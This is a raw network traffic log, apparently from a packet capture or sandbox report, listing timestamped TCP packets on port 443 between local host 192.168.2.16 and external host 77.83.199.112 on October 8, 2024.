                                                                                                                                                  Oct 8, 2024 15:23:45.341223001 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.341273069 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.341586113 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.341607094 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.341669083 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.341679096 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.341737032 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.364181042 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.364202023 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.364304066 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.364314079 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.364365101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.429792881 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.429811954 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.429891109 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.429913998 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.429961920 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.430025101 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.430042982 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.430098057 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.430107117 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.430145025 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.430550098 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.430566072 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.430624008 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.430632114 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.430695057 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.431102037 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.431119919 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.431164026 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.431171894 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.431195974 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.431210995 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.431457996 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.431480885 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.431545019 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.431552887 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.431595087 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.432043076 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.432060003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.432111979 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.432120085 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.432159901 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.433012962 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.433029890 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.433098078 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.433106899 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.433166981 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.454869032 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.454904079 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.454957962 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.454967976 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.455024958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.455050945 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.522619009 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.522639990 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.522707939 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.522743940 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.522764921 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.522784948 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.523231030 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.523252964 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.523307085 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.523318052 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.523627996 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.523648024 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.523662090 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.523669958 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.523683071 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.523725033 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.524110079 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524116993 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524167061 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.524177074 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524207115 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.524234056 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.524741888 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524765968 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524823904 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524825096 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.524838924 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524854898 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524879932 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.524925947 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.524934053 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.524976969 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.525557995 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.525573969 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.525626898 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.525635958 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.525674105 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.545907021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.545938015 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.546032906 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.546045065 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.546088934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.613477945 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.613507032 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.613615990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.613643885 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.613701105 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.613982916 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614000082 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614048958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614058971 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614109993 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614397049 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614413977 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614464998 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614474058 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614500046 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614522934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614782095 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614808083 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614851952 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614861965 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.614892960 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.614922047 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615272999 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615292072 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615348101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615356922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615407944 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615885973 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615904093 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.615962982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.615971088 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616014957 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.616431952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616447926 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616506100 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.616514921 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.616569996 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.636346102 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.636363029 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.636482954 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.636499882 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.636553049 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.713612080 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.713638067 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.713774920 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.713799000 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.713846922 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714013100 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714030027 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714107990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714114904 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714174986 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714590073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714608908 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714664936 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.714672089 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.714708090 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715054035 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715073109 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715197086 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715203047 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715250969 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715496063 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715512037 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715575933 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715583086 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715629101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.715970039 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.715986967 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716078043 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.716085911 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716133118 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.716317892 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716336012 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716406107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.716412067 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.716463089 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.727261066 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.727298021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.727436066 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.727464914 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.727617025 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804672003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804702044 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804799080 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804810047 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804852962 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804903984 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804920912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.804976940 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.804985046 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805042982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805377960 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805406094 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805460930 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805469036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805509090 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805638075 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805655003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805715084 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.805722952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.805763006 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806118011 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806133986 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806190014 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806200981 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806242943 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806492090 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806514025 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806576014 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806583881 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806648970 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806829929 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806849957 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806917906 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.806926012 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.806976080 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.819030046 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.819060087 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.819160938 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.819180012 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.819243908 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.895944118 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896014929 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896070004 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896085978 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896132946 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896209002 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896260023 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896287918 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896297932 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896315098 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896342039 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896508932 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896559000 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896593094 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896600962 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896621943 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896637917 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896641970 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896653891 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896682024 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896688938 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896728039 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896733999 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.896756887 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.896787882 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.897420883 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.897438049 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.897488117 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.897495985 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.897540092 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.898017883 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.898036003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.898103952 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.898112059 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.898152113 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.898317099 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.898333073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.898389101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.898397923 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.898446083 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.909315109 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.909333944 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.909442902 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.909476995 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.909526110 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986262083 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986316919 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986393929 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986438036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986469030 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986495972 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986496925 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986541986 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986587048 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986599922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986612082 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986629009 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986666918 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986695051 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986814976 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986855030 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986901045 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986915112 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.986953020 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.986974955 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.987245083 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.987287998 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.987337112 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.987351894 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.987380981 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.987436056 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.988049984 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.988091946 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.988126040 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.988135099 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.988162041 CEST49707443192.168.2.1677.83.199.112
